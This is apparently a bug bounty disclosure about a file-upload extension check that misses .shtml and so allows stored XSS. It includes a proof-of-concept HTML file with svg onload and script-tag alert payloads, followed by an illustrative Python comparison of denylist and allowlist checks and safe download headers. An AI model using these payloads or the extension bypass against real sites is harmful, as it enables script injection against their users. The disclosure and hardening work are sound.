Hi. This is a bypass of the report at https://huntr.dev/bounties/df347aa9-ed9b-4f75-af99-c83b8aad3bcf/ . It fails to check for files with the .shtml extension,
which leads to stored XSS.
<!-- poc.shtml : uploaded as-is; the extension check does not block .shtml -->
<html>
<body>
<h1>adsasdadsdsa</h1>
<!-- two payloads: an event handler on an inline SVG and a plain script tag -->
<svg/onload=alert()>
<script>alert(1)</script>
</body>
</html>
Stored XSS
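The bypass above is the classic weakness of a denylist extension check: every browser-renderable extension the list forgets (.shtml here, but also .xhtml, .svg, .htm and so on) sails through. The following added example is not the project's code and not part of the report; it contrasts a hypothetical denylist in the style of the original fix with an allowlist check that also refuses anything a browser would render as HTML, and shows the response headers that make a stored file harmless even if a check is missed. All names and lists are illustrative assumptions.

```python
import os.path

# Hypothetical denylist in the spirit of a fix that only blocks the obvious
# HTML-like extensions. Constructed for illustration; not the project's code.
DENYLIST = {".html", ".htm", ".js"}

# Allowlist of what the upload endpoint is meant to accept at all (assumed).
ALLOWLIST = {".png", ".jpg", ".jpeg", ".gif", ".pdf", ".txt"}

# Extensions a browser may render as markup or execute script from when the
# file is served inline. Kept separate so it is rejected even if someone
# later adds one of these to ALLOWLIST by mistake.
BROWSER_ACTIVE = {
    ".html", ".htm", ".shtml", ".xhtml", ".xht",
    ".svg", ".xml", ".js", ".mjs",
}


def _ext(filename: str) -> str:
    """Extension of the final path component, lower-cased.

    Normalises backslashes so 'dir\\poc.shtml' and 'dir/poc.shtml' agree,
    and takes only the last extension, so 'poc.png.shtml' yields '.shtml'.
    """
    base = os.path.basename(filename.replace("\\", "/"))
    _, ext = os.path.splitext(base)
    return ext.lower()


def denylist_check(filename: str) -> bool:
    """Vulnerable pattern: accept unless the extension is on the denylist.

    'poc.shtml' is accepted because nobody listed it; so is 'poc.html.'
    (trailing dot) because its extension is '.' rather than '.html'.
    """
    return _ext(filename) not in DENYLIST


def allowlist_check(filename: str) -> bool:
    """Hardened pattern: accept only a known-good extension.

    Anything without an extension, anything browser-active, and anything
    not explicitly allowed is rejected.
    """
    ext = _ext(filename)
    if not ext or ext in BROWSER_ACTIVE:
        return False
    return ext in ALLOWLIST


def download_headers(filename: str) -> dict:
    """Headers for serving a stored upload so a browser will not render it.

    Content-Disposition: attachment forces a download, and nosniff stops the
    browser from second-guessing the declared Content-Type. This is the
    defence-in-depth layer for the day the extension check is bypassed again.
    """
    safe_name = os.path.basename(filename.replace("\\", "/")).replace('"', "")
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{safe_name}"',
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    for name in ["poc.html", "poc.shtml", "poc.png.shtml", "POC.XHTML", "photo.PNG", "poc.html."]:
        print(f"{name:15} denylist={denylist_check(name)!s:5} allowlist={allowlist_check(name)}")
```

Run stand-alone, the loop shows that the denylist accepts `poc.shtml`, `poc.png.shtml`, `POC.XHTML` and `poc.html.`, while the allowlist accepts only `photo.PNG`. The allowlist is the real fix; the headers are what keeps an upload from becoming stored XSS when the next forgotten extension turns up.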